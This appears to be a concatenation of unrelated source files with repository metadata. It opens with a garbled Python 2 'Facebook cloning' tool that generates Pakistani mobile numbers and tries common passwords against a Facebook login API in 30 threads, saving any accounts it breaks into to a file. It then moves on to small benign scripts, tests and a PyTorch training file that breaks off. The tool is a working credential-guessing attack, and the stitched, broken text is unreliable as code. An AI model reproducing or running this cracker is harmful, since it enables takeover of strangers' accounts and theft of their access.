nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;92m╔╗─╔╗╔═══╗╔═╗╔═╗╔═══╗╔═╗─╔╗
\033[1;93m║║─║║║╔═╗║║║╚╝║║║╔═╗║║║╚╗║║
\033[1;94m║║─║║║╚══╗║╔╗╔╗║║║─║║║╔╗╚╝║
\033[1;95m║║─║║╚══╗║║║║║║║║╚═╝║║║╚╗║║
\033[1;96m║╚═╝║║╚═╝║║║║║║║║╔═╗║║║─║║║
\033[1;97m╚═══╝╚═══╝╚╝╚╝╚╝╚╝─╚╝╚╝─╚═╝
\033[1;98m╔══╗╔══╗╔══╗╔═╗
\033[1;99m║══╣╚╗╔╝║╔╗║║╬║
\033[1;94m╠══║─║║─║╠╣║║╗╣
\033[1;96m╚══╝─╚╝─╚╝╚╝╚╩╝
\033[1;98m╔══╗─╔═══╗╔╗──╔╗
\033[1;96m║╔╗║─║╔═╗║║╚╗╔╝║
\033[1;92m║╚╝╚╗║║─║║╚╗╚╝╔╝
\033[1;94m║╔═╗║║║─║║─╚╗╔╝─
\033[1;97m║╚═╝║║╚═╝║──║║──
\033[1;96m╚═══╝╚═══╝──╚╝──
\033[1;92m---------------------USMAN---------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mThe Credit For This Code Goes To USMAN..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91mDEVOLPER
USMAN STAR
\033[1;94mFACEBOOK
USMAN JUTT
\033[1;91mYOUTUBE
NONE
\033[1;93mGITHUB
USMAN204
\033[1;92mWHATAAPP
03444697164
\033[1;92m Apna Time ay ga
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mBlacklist Life gun mri wife Tour touch Sky..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;92m--------------------USMAN----------------------
"""
####Logo####
logo1 = """
\033[1;94m ██╗░░░██╗░██████╗███╗░░░███╗░█████╗░███╗░░██╗
\033[1;92m ██║░░░██║██╔════╝████╗░████║██╔══██╗████╗░██║
\033[1;96m ██║░░░██║╚█████╗░██╔████╔██║███████║██╔██╗██║
\033[1;92m ██║░░░██║░╚═══██╗██║╚██╔╝██║██╔══██║██║╚████║
\033[1;91m ╚██████╔╝██████╔╝██║░╚═╝░██║██║░░██║██║░╚███║
\033[1;94m░╚═════╝░╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝
\033[1;91m------------------USMAN----------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mThe Credit For This Code Goes To USMAN STAR..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91mDEVOLPER
USMAN STAR
\033[1;94mFACEBOOK
USMAN JUTT
\033[1;91mYOUTUBE
NONE
\033[1;93mGITHUB
USMAN204
\033[1;92mWHATAAPP
03444697164
\033[1;92m Apna Time ay ga
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mBlacklist Life gun mri wife Tour touch Sky..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;95m-----------------ROMAN------------------------
"""
logo2 = """
\033[1;94m ██╗░░░██╗░██████╗███╗░░░███╗░█████╗░███╗░░██╗
\033[1;92m ██║░░░██║██╔════╝████╗░████║██╔══██╗████╗░██║
\033[1;96m ██║░░░██║╚█████╗░██╔████╔██║███████║██╔██╗██║
\033[1;92m ██║░░░██║░╚═══██╗██║╚██╔╝██║██╔══██║██║╚████║
\033[1;91m ╚██████╔╝██████╔╝██║░╚═╝░██║██║░░██║██║░╚███║
\033[1;94m░╚═════╝░╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝
print logo
print 47* '\033[1;97m.'
jalan('\x1b[0;91m░██████╗████████╗░█████╗░██████╗░')
jalan('\x1b[0;91m██╔════╝╚══██╔══╝██╔══██╗██╔══██╗')
jalan('\x1b[1;91m╚█████╗░░░░██║░░░███████║██████╔╝')
jalan('\x1b[1;90m░╚═══██╗░░░██║░░░██╔══██║██╔══██╗')
jalan('\x1b[1;90m██████╔╝░░░██║░░░██║░░██║██║░░██║')
jalan('\x1b[1;90m╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝')
print
jalan('\x1b[0;91m ██████╗░░█████╗░██╗░░░██╗')
jalan('\x1b[0;91m ██╔══██╗██╔══██╗╚██╗░██╔╝')
jalan('\x1b[1;91m ██████╦╝██║░░██║░╚████╔╝░')
jalan('\x1b[1;90m ██╔══██╗██║░░██║░░╚██╔╝░░')
jalan('\x1b[1;90m ██████╦╝╚█████╔╝░░░██║░░░')
jalan('\x1b[1;90m ╚═════╝░░╚════╝░░░░╚═╝░░░')
print
\033[1;91m---------------------USMAN-------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mThe Credit For This Code Goes To USMAN.. ..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91mDEVOLPER
USMAN STAR
\033[1;94mFACEBOOK
USMAN JUTT
\033[1;91mYOUTUBE
NONE
\033[1;93mGITHUB
USMAN204
\033[1;92mWHATAAPP
03444697164
\033[1;92m Apna Time ay ga
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mBlacklist Life gun mri wife Tour touch Sky..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;97m---------------------USMAN--------------------
"""
CorrectUsername = "USMAN"
CorrectPassword = "STAR BOY"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m\x1b[1;91mTool Username \x1b[1;97m»» \x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m \x1b[1;91mTool Password \x1b[1;97m» \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;94mWrong Password"
os.system('WHATSAPP 03444697164')
else:
print "\033[1;94mWrong Username"
os.system('WHATSAPP 03444697164')
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;91m[1]\x1b[1;91mSTART ( \033[1;92m NOW)"
time.sleep(0.05)
print "\033[1;95m[2]\x1b[1;93mUPDATE (9.0)"
time.sleep(0.05)
print '\x1b[1;94m[0]\033[1;91m Exit ( Back)'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
if peak =="":
print "\x1b[1;97mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\x1b[1;91m[1] START CLONING '
time.sleep(0.10)
print '\x1b[1;92m[2] FB ACCOUNT'
time.sleep(0.10)
print '\x1b[1;95m[3] MORE INFO'
time.sleep(0.10)
print '\x1b[1;96m[4] TRACKER'
time.sleep(0.10)
print '\x1b[1;97m[5] CLONING ERROR'
time.sleep(0.10)
print '\x1b[1;91m[6] FACEBOOK'
time.sleep(0.10)
print '\x1b[1;94m[0] back'
time.sleep(0.05)
action()
def action():
peak = raw_input('\n\033[1;97mCHOOSE:\033[1;97m')
if peak =='':
print '[!] Fill In Correctly'
action()
elif peak =="1":
os.system("clear")
print logo2
print "Enter any Pakistan Mobile code Number"+'\n'
print 'Enter any code 1 to 49'
print 'telenor.jazz.zong.warid'
try:
c = raw_input("\033[1;97mCHOOSE : ")
k="03"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
blackmafiax()
elif peak =='0':
login()
else:
print '[!] Fill In Correctly'
action()
print 50* '\033[1;94m-'
xxx = str(len(id))
jalan ('\033[1;91m Total ids number: '+xxx)
jalan ('\033[1;92mCode you choose: '+c)
jalan ("\033[1;93mWait A While Start Cracking...")
jalan ("\033[1;94mTo Stop Process Press Ctrl+z")
print 50* '\033[1;97m-'
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass1
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass1
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass2
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass2
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="Pakistan123"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass3
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass3
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4="SOMI11"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass4
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass4
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass5="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass5
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass5+'\n')
okb.close()
oks.append(c+user+pass5)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass5
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass5+'\n')
cps.close()
cpb.append(c+user+pass5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50* '\033[1;91m-'
print 'Process Has Been Completed ...'
print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
print('Cloned Accounts Has Been Saved : save/cloned.txt')
jalan("Note : Your Offline account Will Open after 10 to 20 days")
print ''
print """
███
──────────███║║║║║║║███
─────────█║║║║║║║║║║║║║█
────────█║║║║███████║║║║█
───────█║║║║██─────██║║║║█
──────█║║║║██───────██║║║║█
─────█║║║║██─────────██║║║║█
─────█║║║██───────────██║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
────███████───────────███████
───██║║║║║║██────────██║║║║║██
──██║║║║║║║║██──────██║║║║║║║██
─██║║║║║║║║║║██───██║║║║║║║║║║██
██║║║║║║║║║║║║█████║║║║║║║║║║║║██
█║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║█
█║║║║║║║║║║║║║█████║║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
██║║║║║║║║║║║█░░░░░█║║║║║║║║║║║██
██║║║║║║║║║║║║█░░░█║║║║║║║║║║║║██
─██║║║║║║║║║║║█░░░█║║║║║║║║║║║██
──██║║║║║║║║║║█░░░█║║║║║║║║║║██
───██║║║║║║║║║█░░░█║║║║║║║║║██
────██║║║║║║║║█████║║║║║║║║██
─────██║║║║║║║║███║║║║║║║║██
──────██║║║║║║║║║║║║║║║║║██
───────██║║║║║║║║║║║║║║║██
────────██║║║║║║║║║║║║║██
─────────██║║║║║║║║║║║██
──────────██║║║║║║║║║██
───────────██║║║║║║║██
────────────██║║║║║██
─────────────██║║║██
──────────────██║██
───────────────███
───────────────────────▄██▄▄██▄
──────────────────────██████████
──────────────────────▀████████▀
────────────────────────▀████▀
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
──────────────────────▄▄▄████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▄█████▀
\033[1;96mThanks me later
\033[1;95mFb\033[1;97mUSMAN STAR
\033[1;95myoutube\033[1;9703444697164"""
raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
b3f4e2fa2b03f2d9fa20bdc2cbd2a0670ee8d3d4 | 8770d4f7f9bc305b79d0c372b320273e78131229 | /3(1)voting.py | f0826825a8c44bc4e4a25188ac15a2fc2fbda4bb | [] | no_license | tarundev-x/55_PYTHON-lab_experiements | 29010618f565bdb21d58646e402219ef18ed1c1a | 9ba0154ac00dca4ed4df91d2942f565160f0a86f | refs/heads/main | 2023-04-25T00:49:53.686538 | 2021-05-15T07:04:42 | 2021-05-15T07:04:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | age=int(input("Enter your age"))
if age>=18:
print("you are eligible to vote")
else:
print("your are not eligible to vote")
#output:Enter your age20
#you are eligible to vote
| [
"noreply@github.com"
] | noreply@github.com |
a191f458a432f1b0535f9c286f67eba82f9f13ab | 07cc9fa9f87e1d7dba35b9ec3788c08bf5aabbcb | /import requests.py | 1966589d6232e1d1c21eed575795c6948d7ef916 | [] | no_license | rgallagher86/Projects | d84c80be67068867884cb2c7c67347dc7005b5e4 | cb40b3e2b7be632596999d92f5aa3bd66a2d08ac | refs/heads/master | 2022-08-16T16:26:10.411619 | 2022-08-11T03:08:32 | 2022-08-11T03:08:32 | 120,629,477 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import csv
import requests
import os
path = os.getcwd()
print(path)
url = 'https://gorest.co.in/public/v2/users'
headers = { "content-type": "application/json" }
response = requests.get(url,headers)
print(response.status_code)
data = response.json()
#data = data['Data']
csvHeader = 'id,email'
with open(str(path) + "\\emaillist.csv","w") as f:
writer = csv.writer(f)
print(csvHeader)
for value in data:
email = str(value['email'])
userId = str(value['id'])
status = str(value['status'])
row = userId + ',' + email
if email.endswith('.io') and status == 'active':
print(row)
print(status)
f.write(row) | [
"rgallagher28@outlook.com"
] | rgallagher28@outlook.com |
8056f5ec5c2b98acace02db1a7237c326908a2ad | 07776f343f5caa22784ca44803695b80d551fbb2 | /carga_horaria/migrations/0079_auto_20210303_1739.py | 73c6d06aa64a5814342d2faa9830c8b4ab4d5e04 | [] | no_license | j-alexander-acosta/AAGESuite-Antiguo | 83a590d1fbe1d39a56f1455bc04bf78364d70661 | c14ab5a7d03fb6f45d29f0665a948da3387104fb | refs/heads/master | 2023-08-30T20:33:32.249922 | 2021-10-28T18:03:55 | 2021-10-28T18:03:55 | 428,706,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.28 on 2021-03-03 17:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a nullable ``fecha_inicio`` (contract start date) field.

    Auto-generated; the field is added both to ``Profesor`` and to
    ``HistoricalProfesor`` (presumably the django-simple-history shadow
    table — TODO confirm) so history rows stay schema-compatible.
    """

    # Must run after migration 0078 of the carga_horaria app.
    dependencies = [
        ('carga_horaria', '0078_auto_20210114_2131'),
    ]

    operations = [
        # Mirror field on the historical-tracking table.
        migrations.AddField(
            model_name='historicalprofesor',
            name='fecha_inicio',
            field=models.DateField(null=True, verbose_name='fecha inicio contrato'),
        ),
        # Actual field on the live Profesor model; nullable so existing rows
        # need no default value.
        migrations.AddField(
            model_name='profesor',
            name='fecha_inicio',
            field=models.DateField(null=True, verbose_name='fecha inicio contrato'),
        ),
    ]
| [
"don@hso.rocks"
] | don@hso.rocks |
324c8db32c2043eae2b04e66a691c1e62e9cfe83 | 9e76a2f8c42d88b8af50ee2c6111f92b49e9843e | /tests/test_epytext_writer.py | 690fc0db7590959fa19aed4da1019e5c45ce6e8e | [
"BSD-3-Clause"
] | permissive | justinchuby/docconvert | 33dad9724b6600cffc9d7c24111be06830aac5c6 | 2843f7446546ae90ba3f38e1246e69d208e0f053 | refs/heads/master | 2023-03-19T17:17:34.861428 | 2020-07-11T16:37:51 | 2020-07-11T16:37:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,818 | py | """Unit tests for EpytextWriter."""
import docconvert
class TestEpytextWriter(object):
    """Unit tests for EpytextWriter output, one element type per test."""

    @classmethod
    def setup_method(cls):
        # Every test starts from a fresh docstring model and default config.
        cls.doc = docconvert.parser.Docstring()
        cls.config = docconvert.configuration.DocconvertConfiguration.create_default()

    def _render(self, indent):
        """Render ``self.doc`` through an EpytextWriter and return the lines."""
        return docconvert.writer.EpytextWriter(self.doc, indent, self.config).write()

    def test_write_attributes(self):
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_element(("raw", ["This is a docstring."]))
        self.doc.add_attribute("attr1", kind="str")
        self.doc.add_attribute("attr2", desc=["Description.", "More description."])
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '    """This is a docstring.\n',
            "    @var attr1:\n",
            "    @type attr1: str\n",
            "    @var attr2: Description. More description.\n",
            '    """\n',
        ]
        assert self._render("    ") == expected

    def test_write_attributes_without_types(self):
        self.config.output.use_types = False
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_attribute("attr1", kind="str")
        self.doc.add_attribute("attr2", kind="int", desc=["Description.", "More description."])
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""\n',
            "@var attr1:\n",
            "@var attr2: Description. More description.\n",
            '"""\n',
        ]
        assert self._render("") == expected

    def test_write_args(self):
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_element(("raw", ["This is a docstring."]))
        self.doc.add_arg("arg1", kind="str")
        self.doc.add_arg("arg2", kind="int", desc=["Description.", "More description."], optional=True)
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""This is a docstring.\n',
            "@param arg1:\n",
            "@type arg1: str\n",
            "@param arg2: Description. More description.\n",
            "@type arg2: int\n",
            '"""\n',
        ]
        assert self._render("") == expected

    def test_write_args_with_optional(self):
        self.config.output.use_optional = True
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_element(("raw", ["This is a docstring."]))
        self.doc.add_arg("arg1", optional=True)
        self.doc.add_arg("arg2", kind="int", desc=["Description.", "More description."], optional=True)
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""This is a docstring.\n',
            "@param arg1:\n",
            "@type arg1: optional\n",
            "@param arg2: Description. More description.\n",
            "@type arg2: int, optional\n",
            '"""\n',
        ]
        assert self._render("") == expected

    def test_write_args_with_keywords_section(self):
        self.config.output.separate_keywords = True
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_element(("raw", ["This is a docstring."]))
        self.doc.add_arg("arg1", kind="str")
        self.doc.add_arg("arg2", kind="int", desc=["Description.", "More description."], optional=True)
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""This is a docstring.\n',
            "@param arg1:\n",
            "@type arg1: str\n",
            "@keyword arg2: Description. More description.\n",
            "@type arg2: int\n",
            '"""\n',
        ]
        assert self._render("") == expected

    def test_write_args_with_keywords_section_with_optional(self):
        self.config.output.separate_keywords = True
        self.config.output.use_optional = True
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_element(("raw", ["This is a docstring."]))
        self.doc.add_arg("arg1", kind="str", optional=True)
        self.doc.add_arg("arg2", kind="int", desc=["Description.", "More description."], optional=True)
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""This is a docstring.\n',
            "@keyword arg1:\n",
            "@type arg1: str\n",
            "@keyword arg2: Description. More description.\n",
            "@type arg2: int\n",
            '"""\n',
        ]
        assert self._render("") == expected

    def test_write_raises(self):
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_raises("TypeError")
        self.doc.add_raises("KeyError", desc=["Description.", "More description."])
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""\n',
            "@raises TypeError:\n",
            "@raises KeyError: Description. More description.\n",
            '"""\n',
        ]
        assert self._render("") == expected

    def test_write_returns(self):
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_return("str", desc=["Description.", "More description."])
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""\n',
            "@returns: Description. More description.\n",
            "@rtype: str\n",
            '"""\n',
        ]
        assert self._render("") == expected

    def test_write_directives(self):
        self.doc.add_element(("start_quote", '"""'))
        self.doc.add_element(("note", ["Description.", "More description."]))
        # The remaining directives share a single-line description.
        for directive in ("example", "reference", "warning", "seealso", "todo"):
            self.doc.add_element((directive, ["Description."]))
        self.doc.add_element(("end_quote", '"""'))
        expected = [
            '"""\n',
            "@note: Description.\n",
            "    More description.\n",
            "@example: Description.\n",
            "@reference: Description.\n",
            "@warning: Description.\n",
            "@seealso: Description.\n",
            "@todo: Description.\n",
            '"""\n',
        ]
        assert self._render("") == expected
| [
"cameronjbillingham@gmail.com"
] | cameronjbillingham@gmail.com |
e20be4dff4b04d5fd5656ee61a9aa126086bb2d5 | 2208ecadbd4906bcde445389ee888368915b0e61 | /Grading.py | 2aedf90d2125bbbb3eb387808241f6bebfe9dab3 | [] | no_license | Anga22/testrepo | f3360ef9a7305fba41610041cce240b609e7148b | 4ddee89e84c8134cbf7d113886d3773da84dfd96 | refs/heads/main | 2022-12-28T20:02:56.757653 | 2020-10-03T16:39:58 | 2020-10-03T16:39:58 | 300,925,172 | 0 | 0 | null | 2020-10-03T16:39:59 | 2020-10-03T16:26:31 | Python | UTF-8 | Python | false | false | 294 | py | #!/usr/bin/env python
# coding: utf-8
# In[58]:
x = int(input())
if x < 50 :
y = ('Fail')
if x >= 75 :
y = ('First')
if 70 <= x <= 74 :
y = ('Upper second')
if 60 <= x <= 69 :
y = ('Lower second')
if 50 <= x <= 59 :
y = ('Third')
print(y)
# In[ ]:
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
e61a60e4b4b44d54848881f621d76d68a6caed43 | 3cd16e9e9b4b99ba26cd89f115a3dc8a66832022 | /pytorch_TEM_train.py | b85e13421a1bb77da9ec06278f544b6b249735cb | [] | no_license | guilk/diva | 407e63be6d95b07c64f9284094be35002af13af0 | 6afd81f7cca6f195255de8adc98ef64ed794e7ae | refs/heads/master | 2020-03-29T03:47:55.185354 | 2018-10-19T01:19:10 | 2018-10-19T01:19:10 | 149,501,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,654 | py | import torch
import torch.optim as optim
from torch.autograd import Variable
import torch.nn as nn
from TEM_model import TEM
# import TEM_load_data
import pytorch_TEM_load_data as TEM_load_data
import argparse
import numpy as np
import os
import cPickle
def binary_logistic_loss(gt_scores, pred_anchors):
    '''
    Calculate weighted binary logistic loss.

    Positives (gt > 0.5) are up-weighted by the positive/negative class
    ratio so sparse positive labels still contribute to the gradient.

    :param gt_scores: Tensor of ground-truth scores in [0, 1], any shape.
    :param pred_anchors: Tensor of predicted probabilities in (0, 1),
        same number of elements as gt_scores.
    :return: (loss, [num_positive, ratio]) where loss is a scalar tensor.
    '''
    gt_scores = gt_scores.contiguous().view(-1)
    pred_anchors = pred_anchors.contiguous().view(-1)
    # FIX: .float() keeps the mask on the input's device; the original
    # .type(torch.cuda.FloatTensor) crashed on CPU tensors.
    pmask = (gt_scores > 0.5).float()
    num_positive = pmask.sum()
    num_entries = gt_scores.size(0)
    # FIX: guard against a batch with no positives (ratio would be inf and
    # the loss NaN). NOTE(review): a batch where *every* entry is positive
    # still yields ratio == 1 and a division by zero below, as in the
    # original -- callers appear to guarantee mixed batches; confirm.
    ratio = num_entries / num_positive.clamp(min=1.0)
    coef_0 = 0.5 * ratio / (ratio - 1)
    coef_1 = coef_0 * (ratio - 1)
    # FIX: clamp predictions away from {0, 1} so log() cannot return -inf.
    eps = 1e-8
    pred_anchors = pred_anchors.clamp(eps, 1.0 - eps)
    loss = coef_1 * pmask * torch.log(pred_anchors) + coef_0 * (1.0 - pmask) * torch.log(1.0 - pred_anchors)
    loss = -torch.mean(loss)
    num_sample = [num_positive, ratio]
    return loss, num_sample
def run_tem(tem_model, X_feature, Y_action, Y_start, Y_end):
    """Forward one feature batch through the TEM and compute its losses.

    Returns (total, action, start, end) loss tensors, with the actionness
    term weighted twice as heavily as the two boundary terms.
    """
    anchors = tem_model(X_feature)
    # Channel layout of the TEM output: 0 = actionness, 1 = start, 2 = end.
    action_pred = anchors[:, 0, :]
    start_pred = anchors[:, 1, :]
    end_pred = anchors[:, 2, :]
    loss_action, _ = binary_logistic_loss(Y_action, action_pred)
    loss_start, _ = binary_logistic_loss(Y_start, start_pred)
    loss_end, _ = binary_logistic_loss(Y_end, end_pred)
    total_loss = 2 * loss_action + loss_start + loss_end
    return total_loss, loss_action, loss_start, loss_end
def parse_arguments(argv=None):
    """Parse TEM training hyper-parameters from the command line.

    :param argv: optional list of argument strings to parse; when None
        (the default, preserving the original call signature) argparse
        reads sys.argv[1:].
    :return: argparse.Namespace with the parsed options.
    """
    parser = argparse.ArgumentParser()
    # parser.add_argument('--cuda', action='store_true', help='enables cuda')
    # FIX: help text previously claimed default=0.00005; the real default is 0.0001.
    parser.add_argument('--lr', type=float, default=0.0001, help='learning rate for Critic, default=0.0001')
    parser.add_argument('--beta1', type=float, default=0.9, help='beta1 for adam. default=0.9')
    parser.add_argument('--niter', type=int, default=30, help='number of epochs to train for')
